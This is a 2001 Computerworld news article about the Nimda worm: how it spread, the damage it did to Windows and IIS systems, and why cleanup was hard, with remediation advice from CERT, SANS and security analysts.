Nimda Needs Harsh Disinfectant

Worm exploits many system vulnerabilities

Cleaning up after last week's fast-spreading Nimda worm could prove to be harder and more time-consuming for users than it has been after other malicious software attacks.

Companies that aren't careful could be reinfected and leave back doors open for future exploitation, users and analysts said.

"Nothing is cleaning this virus. The tools out today simply delete or quarantine the infected files," said one frustrated e-mailer to Computerworld who requested anonymity.

"We have had 50,000 to 100,000 infected files in my data center alone, and we were patched all the way up [after the Code Red attack]," he wrote. "We are smart people. This one just won't be stopped."

The Nimda worm—reports of which first began flooding into mailing lists and security firms on Sept. 18—is a mass-mailed piece of malicious code that infects systems running Microsoft Corp.'s Windows 95, 98, ME, NT and 2000.


Why Nimda Is a Nuisance

It spreads via both network-based e-mail and Web browsers.

It modifies critical system files and registry keys.

It creates a guest account with administrator privileges.

It increased average Web page download times to 3.07 seconds last Wednesday morning compared with 2.45 seconds the day before, according to a Keynote Systems study of 40 large businesses. Overall site availability fell from 92% to 90%.

Unlike other worms and viruses, Nimda is capable of spreading via both network-based e-mail and Web browsers. It was also written to scan for and exploit back doors left behind by previous viruses such as Code Red and Sadmind.

"The newness of this is that it leverages a number of different vulnerabilities in order to propagate itself," said Allen Householder, an analyst at the CERT Coordination Center at Carnegie Mellon University in Pittsburgh.

Nimda propagates via various means, including modifying Web content on vulnerable systems running Microsoft's Internet Information Server software, Householder said.

In the process, Nimda last week clogged part of the Internet, slowing down or even stopping Web traffic for some users. Many sites also experienced high volumes of e-mail and network traffic as a result of the worm, according to a joint statement from CERT, the SANS Institute in Bethesda, Md., and the Information Technology Association of America in Arlington, Va.

In a four-hour period starting at approximately 8 a.m. CDT Tuesday, the University of Chicago's Web servers were scanned by almost 7,000 unique IP addresses looking for vulnerabilities to exploit, said Larry Lidz, a senior network security officer at the school.

As a result of the attacks, about 20 university servers were infected with the Nimda worm and had to be disconnected from the network, Lidz said. He recommended to school officials that those systems be reformatted and all software reinstalled.

"If somebody has used a back door left by worms such as Code Red to infect your systems, you never really know what they have done to the system," Lidz said.

Insidious Worm

Much of the standard antivirus software that was available at the time the worm struck failed to keep Nimda from spreading, users and analysts said.

The worm does a number of insidious things, such as modifying critical system files and registry keys, making every directory available as a file share and creating a guest account with administrator privileges, said Russ Cooper, an analyst at TruSecure Corp., a Reston, Va.-based security firm.

"These characteristics make it incredibly difficult to clean the worm from an infected system," according to a SANS advisory.

"Running [antivirus software] alone will not fix the problem," said Edward York, chief technical officer at 724 Inc., an application hosting service in Lompoc, Calif.

"The server must be secured all over again, all open shares closed, the Hot Fixes reapplied, the guest account disabled again and all traces of any file called root.exe or admin.dll deleted from the system." York said. Administrators also need to ensure that any registry items added by Nimda have been removed, he said.

Until more sophisticated fixes become available, the only sure course is to disconnect infected systems from the network, reformat their hard drives, reinstall software from a clean source and apply the appropriate security patches, according to recommendations issued by CERT and SANS.

Copyright © 2001 IDG Communications, Inc.

7 inconvenient truths about the hybrid work trend
Shop Tech Products at Amazon